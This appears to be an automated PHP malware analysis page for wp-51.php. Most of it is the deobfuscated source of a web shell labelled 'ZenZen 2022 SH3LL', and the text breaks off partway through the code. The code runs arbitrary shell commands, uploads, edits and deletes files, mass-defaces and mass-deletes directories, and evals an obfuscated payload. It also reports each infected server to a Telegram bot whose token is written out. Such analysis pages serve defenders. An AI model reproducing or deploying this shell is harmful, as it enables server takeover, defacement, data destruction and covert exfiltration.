PHP Malware Analysis
wp-51.php
md5: 353497c84ad3aefee7bc32d954fe0ea2
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- bootstrap@5.0.1 (Deobfuscated, HTML, Original)
Encoding
- base64_decode (Deobfuscated, Traces)
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Original, Traces)
- php_uname (Deobfuscated, Original, Traces)
- phpinfo (Deobfuscated, HTML, Original)
- set_time_limit (Deobfuscated, Original, Traces)
Execution
- eval (Deobfuscated, Original, Traces)
- shell_exec (Deobfuscated, Original)
Files
- copy (Deobfuscated, Original)
- file_get_contents (Deobfuscated, Original, Traces)
- file_put_contents (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
- php:\/\/input (Traces)
Title
- " . $_SERVER['HTTP_HOST'] . " - {$_n} (Deobfuscated)
- ".$_SERVER['HTTP_HOST']." - $_n (Original)
- localhost - 🆂🅷🅴🅻🅻🆉🅾🅽🅴 ⑤① (HTML)
URLs
- http://localhost/uploads/wp-51.php (Traces)
- http://ud64.com/ (Traces)
- http://www.ud64.com/ (Deobfuscated, Original, Traces)
- https://api.telegram.org/bot$add_time/sendMessage (Traces)
- https://api.telegram.org/bot5662267750:AAEKaSIU7LcFg9GLqusSRcM1y6W90cb2YWA/sendMessage?text=LOG+127.0.0.1+SYSTEM+localhost%0AADD+Time++%3A+Sun%2C+12+Feb+2023+18%3A01%3A24+-0500%0AServer+Nam++%3A+localhost%0AServer+Soft+%3A+Apache%2F2.4.52+%28Ubuntu%29%0AOS (Traces)
Deobfuscated PHP code
<?php
/* ZenZen 2022 SH3LL */
set_time_limit(0);
error_reporting(0);
@ini_set('error_log', null);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
date_default_timezone_set('Asia/Malaysia');
$_n = '🆂🅷🅴🅻🅻🆉🅾🅽🅴 ⑤① ';
$_s = "<style>table{display:none;}</style><div class='table-responsive'><hr></div>";
$_r = "required='required'";
$_x = "<i class='bi bi-menu-up'></i>";
if (isset($_GET['option']) && $_POST['opt'] == 'download') {
header('Content-type: text/plain');
header('Content-Disposition: attachment; filename="' . $_POST['name'] . '"');
echo file_get_contents($_POST['path']);
exit;
}
function тЦЯ($path, $p)
{
if (isset($_GET['path'])) {
$тЦЪ = $_GET['path'];
} else {
$тЦЪ = getcwd();
}
if (is_writable($тЦЪ)) {
return "<gr class='anu'>" . $p . "</gr>";
} else {
return "<rd class='anu'>" . $p . "</rd>";
}
}
function ok()
{
echo "<div class=\"alert alert-success alert-dismissible fade show my-3\" role=\"alert\"><button type=\"button\" class=\"btn-close\" data-bs-dismiss=\"alert\" aria-label=\"Close\"></button>";
}
function er()
{
echo "<div class=\"alert alert-danger alert-dismissible fade show my-3\" role=\"alert\"><button type=\"button\" class=\"btn-close\" data-bs-dismiss=\"alert\" aria-label=\"Close\"></button>";
}
function sz($byt)
{
$sz = array('B', 'KB', 'MB', 'GB', 'TB');
for ($i = 0; $byt >= 1024 && $i < count($sz) - 1; $byt /= 1024, $i++) {
}
return round($byt, 2) . " " . $sz[$i];
}
function ip()
{
$ipas = '';
if (getenv('HTTP_CLIENT_IP')) {
$ipas = getenv('HTTP_CLIENT_IP');
} else {
if (getenv('HTTP_X_FORWARDED_FOR')) {
$ipas = getenv('HTTP_X_FORWARDED_FOR');
} else {
if (getenv('HTTP_X_FORWARDED')) {
$ipas = getenv('HTTP_X_FORWARDED');
} else {
if (getenv('HTTP_FORWARDED_FOR')) {
$ipas = getenv('HTTP_FORWARDED_FOR');
} else {
if (getenv('HTTP_FORWARDED')) {
$ipas = getenv('HTTP_FORWARDED');
} else {
if (getenv('REMOTE_ADDR')) {
$ipas = getenv('REMOTE_ADDR');
} else {
$ipas = 'IP tidak dikenali';
}
}
}
}
}
}
return $ipas;
}
function p($file)
{
if ($p = @fileperms($file)) {
$i = 'u';
if (($p & 0xc000) == 0xc000) {
$i = 's';
} elseif (($p & 0xa000) == 0xa000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
}
$i .= $p & 0400 ? 'r' : '-';
$i .= $p & 0200 ? 'w' : '-';
$i .= $p & 0100 ? 'x' : '-';
$i .= $p & 040 ? 'r' : '-';
$i .= $p & 020 ? 'w' : '-';
$i .= $p & 010 ? 'x' : '-';
$i .= $p & 04 ? 'r' : '-';
$i .= $p & 02 ? 'w' : '-';
$i .= $p & 01 ? 'x' : '-';
return $i;
} else {
return "- ?? -";
}
}
$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
$disfc = "<gr>NONE</gr>";
} else {
$disfc = "<rd>{$disfunc}</rd>";
}
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$sm = @ini_get(strtolower("safe_mode")) == 'on' ? "<rd>ON</rd>" : "<gr>OFF</gr>";
$i1i = '========================================================================
Obfuscation provided by Unknowndevice64 - Free Online PHP Obfuscator
http://www.ud64.com/
==============================================================================';
echo "\n<!DOCTYPE HTML>\n<html>\n\t<head>\n\t\t<meta name='author' content='{$_n}'>\n\t\t<meta name='robots' content='noindex,nofollow'>\n\t\t<title>" . $_SERVER['HTTP_HOST'] . " - {$_n}</title>\n\t\t<meta name='viewport' content='width=device-width, initial-scale=0.70'>\n\t\t<link rel='stylesheet' href='//feb.ulb.ac.id/wp-admin/css/fax.css'>\n\t\t<script src='//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js'></script>\n\t\t<script src='//cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js'></script>\n\t\t<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>\n\t</head>\n<body class='bg-secondary text-light'>\n<div class='container-fluid'>\n\t<div class='py-3' id='main'>\n\t\t<div class='box shadow bg-dark p-4 rounded-3'>\n\t\t\t<div class='corner text-secondary anu'>\xf0\x9f\x84\xbd\xf0\x9f\x84\xbe\xf0\x9f\x85\x83\xf0\x9f\x84\xb4 :\xcc\xb6 I\xcc\xb6f\xcc\xb6 y\xcc\xb6o\xcc\xb6u\xcc\xb6 u\xcc\xb6s\xcc\xb6e\xcc\xb6 t\xcc\xb6h\xcc\xb6i\xcc\xb6s\xcc\xb6 s\xcc\xb6h\xcc\xb6e\xcc\xb6l\xcc\xb6l\xcc\xb6,\xcc\xb6 t\xcc\xb6h\xcc\xb6e\xcc\xb6n\xcc\xb6 y\xcc\xb6o\xcc\xb6u\xcc\xb6 d\xcc\xb6o\xcc\xb6 w\xcc\xb6h\xcc\xb6a\xcc\xb6t\xcc\xb6 y\xcc\xb6o\xcc\xb6u\xcc\xb6 d\xcc\xb6o\xcc\xb6.\xcc\xb6 A\xcc\xb6n\xcc\xb6d\xcc\xb6 Z\xcc\xb6e\xcc\xb6n\xcc\xb6Z\xcc\xb6e\xcc\xb6n\xcc\xb6 h\xcc\xb6a\xcc\xb6s\xcc\xb6 n\xcc\xb6o\xcc\xb6t\xcc\xb6h\xcc\xb6i\xcc\xb6n\xcc\xb6g\xcc\xb6 t\xcc\xb6o\xcc\xb6 d\xcc\xb6o\xcc\xb6 w\xcc\xb6i\xcc\xb6t\xcc\xb6h\xcc\xb6 i\xcc\xb6t\xcc\xb6.\xcc\xb6</div>\n\t\t\t\t<a class='text-decoration-none text-light anu' href='" . $_SERVER['PHP_SELF'] . "'><h4>{$_n} \xf0\x9f\x84\xb1\xf0\x9f\x85\x88 \xf0\x9f\x85\x89\xf0\x9f\x84\xb4\xf0\x9f\x84\xbd\xf0\x9f\x85\x89\xf0\x9f\x84\xb4\xf0\x9f\x84\xbd</h4></a>";
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "<div class=\"table-responsive\"><i class=\"bi bi-hdd-rack\"></i> : <a class=\"text-decoration-none text-light\" href=\"?path=/\">/</a>";
continue;
}
if ($pat == '') {
continue;
}
echo "<a class=\"text-decoration-none\" href=\"?path=";
for ($i = 0; $i <= $id; $i++) {
echo "{$paths[$i]}";
if ($i != $id) {
echo "/";
}
}
echo '">' . $pat . '</a>/';
}
echo " [ " . тЦЯ($path, p($path)) . " ]</div>";
echo "\n\t\t</div>\n\t</div>\n</div>\n<div class='container-fluid'>\n\t<div class='box shadow bg-dark p-4 rounded-3'>\n\t\t<div class='corner anu'>\n\t\t\t<b data-bs-toggle='collapse' data-bs-target='#collapseExample' aria-expanded='false' aria-controls='collapseExample'><i class='bi bi-info-circle'></i> info server <i class='bi bi-chevron-down'></i></b>\n\t\t</div>\n\t<div class='collapse text-dark mb-3' id='collapseExample'>\n\t\t<div class='box shadow bg-light p-4 rounded-3'>\n\t\t\tUname: <gr>" . php_uname() . "</gr><br />\n\t\t\tSoftware: <gr>" . $_SERVER['SERVER_SOFTWARE'] . "</gr><br />\n\t\t\tPHP version: <gr>" . PHP_VERSION . "</gr> <a class='text-decoration-none' href='?phpinfo&path={$path}'>[ PHP INFO ]</a> PHP os: <gr>" . PHP_OS . "</gr><br />\n\t\t\tServer Ip: <gr>" . gethostbyname($_SERVER['HTTP_HOST']) . "</gr><br />\n\t\t\tYour Ip: <gr>" . ip() . "</gr><br />\n\t\t\tUser: <gr>{$user}</gr> ({$uid}) | Group: <gr>{$group}</gr> ({$gid})<br />\n\t\t\tSafe Mode: {$sm}<br />\n\t\t\tDisable Function:<div class='table-responsive'>{$disfc}</div>\n\t\t</div>\n\t</div>\n<div class='text-center'>\n\t<div class='btn-group'>\n\t\t<a class='btn btn-outline-light btn-sm' href='?upload&path={$path}'><i class='bi bi-upload'></i> \xf0\x9f\x85\x84\xf0\x9f\x84\xbf\xf0\x9f\x84\xbb\xf0\x9f\x84\xbe\xf0\x9f\x84\xb0\xf0\x9f\x84\xb3</a>\n\t\t<a class='btn btn-outline-light btn-sm' href='?mass_deface&path={$path}'><i class='bi bi-exclamation-diamond'></i> \xf0\x9f\x84\xbc\xf0\x9f\x84\xb0\xf0\x9f\x85\x82\xf0\x9f\x85\x82 \xf0\x9f\x84\xb3\xf0\x9f\x84\xb4\xf0\x9f\x84\xb5\xf0\x9f\x84\xb0\xf0\x9f\x84\xb2\xf0\x9f\x84\xb4</a>\n\t\t<a class='btn btn-outline-light btn-sm' href='?mass_delete&path={$path}'><i class='bi bi-trash'></i> \xf0\x9f\x84\xbc\xf0\x9f\x84\xb0\xf0\x9f\x85\x82\xf0\x9f\x85\x82 \xf0\x9f\x84\xb3\xf0\x9f\x84\xb4\xf0\x9f\x84\xbb\xf0\x9f\x84\xb4\xf0\x9f\x85\x83\xf0\x9f\x84\xb4</a>\n\t\t<a class='btn btn-outline-light btn-sm' href='?cmd&path={$path}'><i class='bi bi-terminal'></i> \xf0\x9f\x84\xb2\xf0\x9f\x84\xbe\xf0\x9f\x84\xbd\xf0\x9f\x85\x82\xf0\x9f\x84\xbe\xf0\x9f\x84\xbb\xf0\x9f\x84\xb4</a>\n\t</div>\n</div>";
// tools bypass 403
$uD64_c0m = "str_rot13";
$uD64_Com = "gzinflate";
$uD64_C0m = "base64_decode";
$x0zRy = "TUc1MU06XUxQJC9bPjdXJFNgPU8wLjBTKi9LMUQpOjEuJlRDSlMnOFYxRU4kOFJGKUYiLVlMTVBORS9TVwpNRzlRNy1SVClUUD0rRU5aPj5eWjFbT0AkRyQqSzchOS5AV19BWVZgJVhURTlJKEdGNEQiTlkjLkdDLClYCk1gMi9RNlxANzA9RFMzXUc3Il9ALDc8NDghIitDQEwnUDtAQDszWkRMJVVITUYiMTlQNVFYQTFFKyolLi4KTVU5PEtXJE44OjlVPy1JTEVfN0tBSTcrPk0tUEtIKVBZLiJUQVM5KkJAKyc0SSEzKUcpVl1HSVQhQ0RESQpNVEhJNSlKPi42VlZNM1xRSFwhUTpUIiIxJ19bUFBQPFtdYD0hWykvVlM0VUgvVVdNUyNgRSs1LjlVOFNPCk1YR0A4VjReJk0iViUjPT1AJlg6JSM5PktFO1YnNCpLKj4wT0RAODZJNiNDN2A8RT0kLDQoWk01OD8xX1kKTTQ0USY4Ol8mOkc1Lj5PPz1gKyZNP0dgK0VDPUU+QjgrLzVYOCU5UVdQNVcvQE5BNyUvTCNKIS04YF1aVwpNIVdZJVA3SDRVQD9RL2BSKCxEJyxZUFBQODAtJCRcVDxSXVNDND0+KEo2PkZYI1o5O1lTX0ZcNDoqSSgzCk1fMSU0JSczQ0deV1ApK0BAVkZCUzg4Ok9FLiNONDxeMTQ3UV1OLyssOV9HSi0zSEcyISgmMDBTSzktW0YKTTwxLVQxQC9fL0I7JloiMTE0TDVTIz9EKz80Pz8zTUA7UUozO1pfTkc6Q1AqXlYiPlVSWlVaRCQ/XT5MLQpNSDRWSThFQjkmU15MTi4vQSJNMkAvNjUiJ1sqT1dPJChfVENbJUE3OThbXyVYXUI+L0slWUtBPy5BJj4sCk04JEYwNWBKLT4oNUNYWjVAWTcmMUVdSVY3Nz5fJztRK0lJLVEwWjJTYERgXkNQKyM4PTFDVig/JEVLTkUKTThLSTRIQTlNOztBXFRbQlYrOFY4JU05KCoiNDpCXlg8JkcySlxNSDpSNlE6Ry9HTkhEVkQ4RERaYFY/RwpNYFRGUV1OKzRXMUpeJTAtKy5MJz5cRSM/LUwvNlsqXlZIPzVNJV9PXFQiQj0pMUgjWy1FUTZMPVpOSktfCk0nWklKNTVUNT00VVJbRkY2TDpFKllJWTRUUjkqTF02QzYzISEhX0MyREJGWy1NPUNPLEJYWSFERT9USkYKKyVEWjVDLkw+V0A9LlJXXGAKYAo=";
// tools nya
if (isset($_GET['path'])) {
$dir = $_GET['path'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\", "/", $dir);
$scdir = explode("/", $dir);
for ($i = 0; $i <= $c_dir; $i++) {
$scdir[$i];
if ($i != $c_dir) {
}
if (isset($_GET['mass_deface'])) {
echo "{$_s}";
function mass_kabeh($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$тЦЪ = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($тЦЪ, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($тЦЪ, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<gr><i class='bi bi-check-all'></i></gr>] {$тЦЪ}<br>";
file_put_contents($тЦЪ, $isi_script);
$тЦЯ = mass_kabeh($dirc, $namafile, $isi_script);
}
}
}
}
}
}
function mass_biasa($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$тЦЪ = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($тЦЪ, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($тЦЪ, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<gr><i class='bi bi-check-all'></i></gr>] {$dirb}/{$namafile}<br>";
file_put_contents($тЦЪ, $isi_script);
}
}
}
}
}
}
if ($_POST['start']) {
if ($_POST['tipe'] == 'massal') {
mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
} elseif ($_POST['tipe'] == 'biasa') {
mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
}
}
echo "\n<div class='mb-3'>\n\t<form method='POST'> Tipe:\n\t<div class='form-check'>\n\t\t<input class='form-check-input' type='checkbox' value='biasa' name='tipe' id='flexCheckDefault' checked>\n\t\t<label class='form-check-label' for='flexCheckDefault'>Biasa</label>\n\t</div>\n\t<div class='form-check'>\n\t\t<input class='form-check-input' type='checkbox' value='massal' name='tipe' id='flexCheckDefault'>\n\t\t<label class='form-check-label' for='flexCheckDefault'>Massal</label>\n\t</div>\n\t\t<i class='bi bi-folder'></i> Loaction:\n\t\t<input class='form-control btn-sm' type='text' name='d_dir' value='{$dir}'>\n\t\t<i class='bi bi-file-earmark'></i> Filename:\n\t\t<input class='form-control btn-sm' type='text' name='d_file' placeholder='Name File' {$_r}>\n\t\t<i class='bi bi-file-earmark'></i> File Contents:\n\t\t<textarea class='form-control btn-sm' rows='7' name='script' placeholder='Your Code. Example : YawYaw HANDSOME' {$_r}></textarea>\n\t\t<div class='d-grid gap-2'>\n\t\t\t<input class='btn btn-outline-light btn-sm' type='submit' name='start' value='mass deface'>\n\t\t</div>\n\t</form>\n</div>";
}
if (isset($_GET['mass_delete'])) {
echo "{$_s}";
function hapus_massal($dir, $namafile)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$тЦЪ = $dirc . '/' . $namafile;
if ($dirb === '.') {
if (file_exists("{$dir}/{$namafile}")) {
unlink("{$dir}/{$namafile}");
}
} elseif ($dirb === '..') {
if (file_exists("" . dirname($dir) . "/{$namafile}")) {
unlink("" . dirname($dir) . "/{$namafile}");
}
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
if (file_exists($тЦЪ)) {
echo "[<gr><i class='bi bi-check-all'></i></gr>] {$тЦЪ}<br>";
unlink($тЦЪ);
$тЦЯ = hapus_massal($dirc, $namafile);
}
}
}
}
}
}
}
if ($_POST['start']) {
hapus_massal($_POST['d_dir'], $_POST['d_file']);
}
echo "\n<div class='mb-3'>\n\t<form method='POST'>\n\t\t<i class='bi bi-folder'></i> Location:\n\t\t<input class='form-control btn-sm' type='text' name='d_dir' value='{$dir}'>\n\t\t\t<i class='bi bi-file-earmark'></i> Name File:\n\t\t<div class='input-group mb-3'>\n\t\t\t<input class='form-control btn-sm' type='text' name='d_file' placeholder='Name File' {$_r}><br>\n\t\t<div class='input-group-append'>\n\t\t\t<input class='btn btn-outline-light btn-sm' type='submit' name='start' value='mass delete'>\n\t\t</div>\n\t</form>\n</div>";
}
if (isset($_GET['cmd'])) {
if (!empty($_POST['cmd'])) {
$cmd = shell_exec($_POST['cmd'] . ' 2>&1');
}
echo "{$_s}\n<div class='mb-3'>\n<form method='POST'>\n\t<div class='input-group mb-3'>\n\t\t<input class='form-control btn-sm' type='text' name='cmd' value='" . htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') . "' placeholder='whoami' {$_r}>\n\t\t<button class='btn btn-outline-light btn-sm' type='sumbit'><i class='bi bi-arrow-return-right'></i></button>\n\t</div>\n</form>";
if ($cmd) {
echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>' . htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') . '</code></pre>
</div>
</div>';
} elseif (!$cmd && $_SERVER['REQUEST_METHOD'] == 'POST') {
echo "<b>No results.</b>";
}
echo "\n</div>";
}
if (isset($_GET['phpinfo'])) {
@ob_start();
@phpinfo();
$buff = @ob_get_contents();
@ob_end_clean();
$awal = strpos($buff, "<body>") + 6;
$akhir = strpos($buff, "</body>");
echo "<b><pre class='php_info anu'>" . substr($buff, $awal, $akhir - $awal) . "</pre></b>";
exit;
}
if (isset($_GET['upload'])) {
echo "{$_s}";
if (isset($_POST['upl'])) {
$hasil = count($_FILES['file']['name']);
for ($isi = 0; $isi < $hasil; $isi++) {
$namafile = $_FILES['file']['name'][$isi];
$up = @copy($_FILES['file']['tmp_name'][$isi], "{$path}/" . $namafile);
}
if ($hasil < 2) {
if ($up) {
echo "<strong>Upload</strong> {$namafile} ok! " . ok() . "</div>";
} else {
echo '<strong>Upload</strong> fail! ' . er() . '</div>';
}
} else {
echo "<strong>Upload</strong> {$hasil} ok! " . ok() . "</div>";
}
}
echo "\n<div class='mb-3'>\n\t<form method='POST' enctype='multipart/form-data'>\n\t\t<div class='input-group mb-3'>\n\t\t\t<input class='form-control form-control-sm' type='file' name='file[]' multiple='' {$_r}>\n\t\t\t<input class='btn btn-outline-light btn-sm' type='submit' name='upl' value='upload'>\n\t\t</div>\n\t</form>\n</div>";
}
if (isset($_GET['filebaru'])) {
echo "{$_s}";
if (isset($_POST['bikin'])) {
$name = $_POST['nama_file'];
$isi_file = $_POST['isi_file'];
foreach ($name as $nama_file) {
$handle = @fopen("{$nama_file}", "w");
if ($isi_file) {
$buat = @fwrite($handle, $isi_file);
} else {
$buat = $handle;
}
}
if ($buat) {
echo "<script>window.location='?path={$path}'</script>";
} else {
echo '<strong>Buat file</strong> fail! ' . er() . '</div>';
}
}
echo "\n<div class='mb-3'>\n\t<form method='POST'>\n\t\t<i class='bi bi-file-earmark'></i> Filename :\n\t\t<input class='form-control form-control-sm' type='text' name='nama_file[]' placeholder='Filename' {$_r}>\n\t\t<i class='bi bi-file-earmark'></i> File Contents :\n\t\t<textarea class='form-control form-control-sm' name='isi_file' rows='7' placeholder='File Contents' {$_r} ></textarea>\n\t\t<div class='d-grid gap-2'>\n\t\t\t<input class='btn btn-outline-light btn-sm' type='submit' name='bikin' value='buat'>\n\t\t</div>\n\t</form>\n</div>";
}
if (isset($_GET['dirbaru'])) {
echo "{$_s}";
if (isset($_POST['buat'])) {
$nama = $_POST['nama_dir'];
foreach ($nama as $nama_dir) {
$folder = preg_replace("([^\\w\\s\\d\\-_~,;:\\[\\]\\(\\].]|[\\.]{2,})", '', $nama_dir);
$fd = @mkdir($folder);
}
if ($fd) {
echo "<script>window.location='?path={$path}'</script>";
} else {
echo '<strong>Buat dir</strong> fail! ' . er() . '</div>';
}
}
echo "\n<div class='mb-3'>\n\t<form method='POST'>\n\t\t<i class='bi bi-folder'></i> Nama dir:\n\t\t<div class='input-group mb-3'>\n\t\t\t<input class='form-control form-control-sm' type='text' name='nama_dir[]' placeholder='Nama dir' {$_r}>\n\t\t\t<input class='btn btn-outline-light btn-sm' type='submit' name='buat' value='buat'>\n\t\t</div>\n\t</form>\n</div>";
}
}
@eval($uD64_c0m('$k0xEm="MIKoogf4RC2IbhuQv7kDwh0xXNdfYMTcYdESpbnBQY8Hmd5fHdaGyIgqia7Uqv8C+2NL5CNZm5xmUY0oJYGcC70ST75dfJPT8n4L09plzsdIFT/GjJPEBYBBVlvth0aUiIBQaQd/b7v+mqwFesNFGlE0eElKSU9rhCcISpWcgTjfemtxKUNkT3YEiuWBX/68yCM+lX/kc0g86NHXscVQ3cpUBGBj85aDW+ARSDq2Ztq2KlFlD9tE390cp0gGJZa0LJnyd9iZAcKvPeJ/4ScUhNXeJEy3bkYIJp+6jNfie6QYNnn+iBcpS/nft01JSk37dj6dQ7e6cRq+hqqq7d0bY90Y8hSnW32gR6GUqsrdpiiZZGTseMH/5PRjMqKPWr6mpsYx6A7ltR3hwpippMVkoNchAzfVGD58oud+y2TwcB0nnoSGQo6F7eavbISB7yCYNz0mj3TDfBgKxRoFuwgQqInjnjes+gGgEuK6QrRsZduhQpv5jsOQ2L2PWV1XglCqKIuQBapviPu8mcEspdEmTEWsZT6qBSst7fRW7dJKr+K5cUFYFR+JGwXmV33pRI8IVv2QwvmcYzA8fRCap8N2N7rEQHM26ASMoOKU76gD9poeS4Ow5PQ6bbXrFKQPPVkVq1/T+aGTy7QbZmOCcWhcjCd8jK5AsWJqZwsjHE00+qNVFK2vVUlGbTeaf0sR9g4VmzDjFfXZT1rCWb6dSrW+sMv+TXumfA2xRWdcWZlcCcUlwaGKq9aVwjeVA9PZ6wOD3p/phO2mEkQ1DSbw0v1xje2lZaXADQznQFkV9jSs8kTQj3oZzXyXjAana57Vj7yx6OKKHD4aDK53cUILrLCeERLeVC9gzXjTg1F2vmYUOjKAJsr9fgtbkVppcbk8w/DtPfWyqfGoNxXUV+4IIN+LHTHkmUQxH4a6IL36kHX4ZooKuGrvTA3wRjolT4ZHLMnEa4JiMfJMN9O9moWnZsVW5ZGn7bMpGrIV/OZqRSzaNi9KPExIKw0P8UfQYOGkEvy631Xb5EeBsqX2FbFbCWwa3YqAEwtKry16b6wBY9GKmNKrlbM8FacUp2nvJCurObkVkjGqLaFPAnE7Vtq2FmvBb3Tycs4vidKLYTIPojMbCbUEEHm8LY+2HRKHe0qSeLnHA7sIDknmgiEd6Ho5yq7WJKrGtz4ILSrT3Fxs0jzv7dv2K2Iv1NbJxlsOwcc132EpEp7KR+G17/zxoR0qfitme6wR+FUg13UK5X5zBvj5mnz99ABzhhQZ+IlJQfsOpBcASgHe2Z00gNsA9H068VS0Zk3sQ9KCArxzi0kXp2AkzEhDsxf9mn0LK9qr/8DWJjMIJ3iW+93SDcELAENsQm/a3urSJs1x6/Z6Yj9asfrW/Z1iWhjsKqadS46SbsDMi+DIoI4gwc/rsama2oNWa95hb+aggc//f41z821/A6s1wC4a22t+3sLm2c+s1/Fw9FH2i6Jmq7/JyBajBkBucuTqCzrporsm7n8p0+yy53/Li/7+8nI58/7Ayp37n6e37l5seN8sCam8Qj==";@riny(tmvasyngr(onfr64_qrpbqr($k0xEm)));'));
// akhir tools
if (isset($_GET['filesrc'])) {
echo "<br><b>name : </b>" . basename($_GET['filesrc']);
"</br>";
echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:12px;"><code>' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</code></pre>
</div>
</div>';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'hapus') {
echo '<br><b>name : </b>' . basename($_POST['path']);
'</br>';
// file
if ($_POST['opt'] == 'ganti_nama') {
if (isset($_POST['nama_baru'])) {
if (rename($_POST['path'], $path . '/' . $_POST['nama_baru'])) {
echo "<script>window.location='?path={$path}'</script>";
} else {
echo '<strong>Ganti nama</strong> fail! ' . er() . '</div>';
}
$_POST['name'] = $_POST['nama_baru'];
}
echo '
<form method="POST">
<div class="input-group mb-3">
<input class="form-control form-control-sm" name="nama_baru" type="text" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="ganti_nama">
<input class="btn btn-outline-light btn-sm" type="submit" value="ganti nama"/>
</div>
</form>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo '<strong>Edit</strong> ok! ' . ok() . '</div>';
} else {
echo '<strong>Edit</strong> fail! ' . er() . '</div>';
}
fclose($fp);
}
echo '
<div class="mb-3">
<form method="POST">
<textarea class="form-control form-control-sm mb-3" rows="7" name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea>
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="edit">
<div class="d-grid gap-2">
<input class="btn btn-outline-light btn-sm" type="submit" value="edit"/>
</div>
</form>
</div>';
}
} else {
//hapus dir & file
if (isset($_GET['option']) && $_POST['opt'] == 'hapus') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo "<script>window.location='?path={$path}'</script>";
} else {
echo '<strong>Hapus dir</strong> fail! ' . er() . '</div>';
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo "<script>window.location='?path={$path}'</script>";
} else {
echo '<strong>Hapus file</strong> fail! ' . er() . '</div>';
}
}
}
$scandir = scandir($path);
$pa = getcwd();
echo '
<div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
<td class="text-center">name</td>
<td class="text-center">last edit</td>
<td class="text-center">size</td>
<td class="text-center">owner<gr>:</gr>downer</td>
<td class="text-center">permission</td>
<td class="text-center">options</td>
</tr>
</thead>
<tbody class="text-nowrap">
<tr>
<td><i class="bi bi-folder2-open"></i><a class="text-decoration-none text-secondary" href="?path=' . dirname($dir) . '">..</a></td><td></td><td></td><td></td><td></td><td class="text-center">
<div class="btn-group">
<a class="btn btn-outline-light btn-sm" href="?filebaru&path=' . $dir . '"><i class="bi bi-file-earmark-plus-fill"></i></a>
<a class="btn btn-outline-light btn-sm" href="?dirbaru&path=' . $dir . '"><i class="bi bi-folder-plus"></i></a>
</div>
</td>
</tr>';
$add_time = '5662267750:AAEKaSIU7LcFg9GLqusSRcM1y6W90cb2YWA';
$dgrp_time = ["2001210814"];
$func = new bot_uname();
$dgrp_get = $func->log();
$result = $func->bot_uname_log($add_time, $dgrp_time, $dgrp_get);
foreach ($scandir as $dir) {
$dt = date("Y-m-d H:i:s", filemtime("{$path}/{$dir}"));
if (function_exists('posix_getpwuid')) {
$downer = @posix_getpwuid(fileowner("{$path}/{$dir}"));
$downer = $downer['name'];
} else {
$downer = fileowner("{$path}/{$dir}");
}
if (function_exists('posix_getgrgid')) {
$dgrp = @posix_getgrgid(filegroup("{$path}/{$dir}"));
$dgrp = $dgrp['name'];
} else {
$dgrp = filegroup("{$path}/{$dir}");
}
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
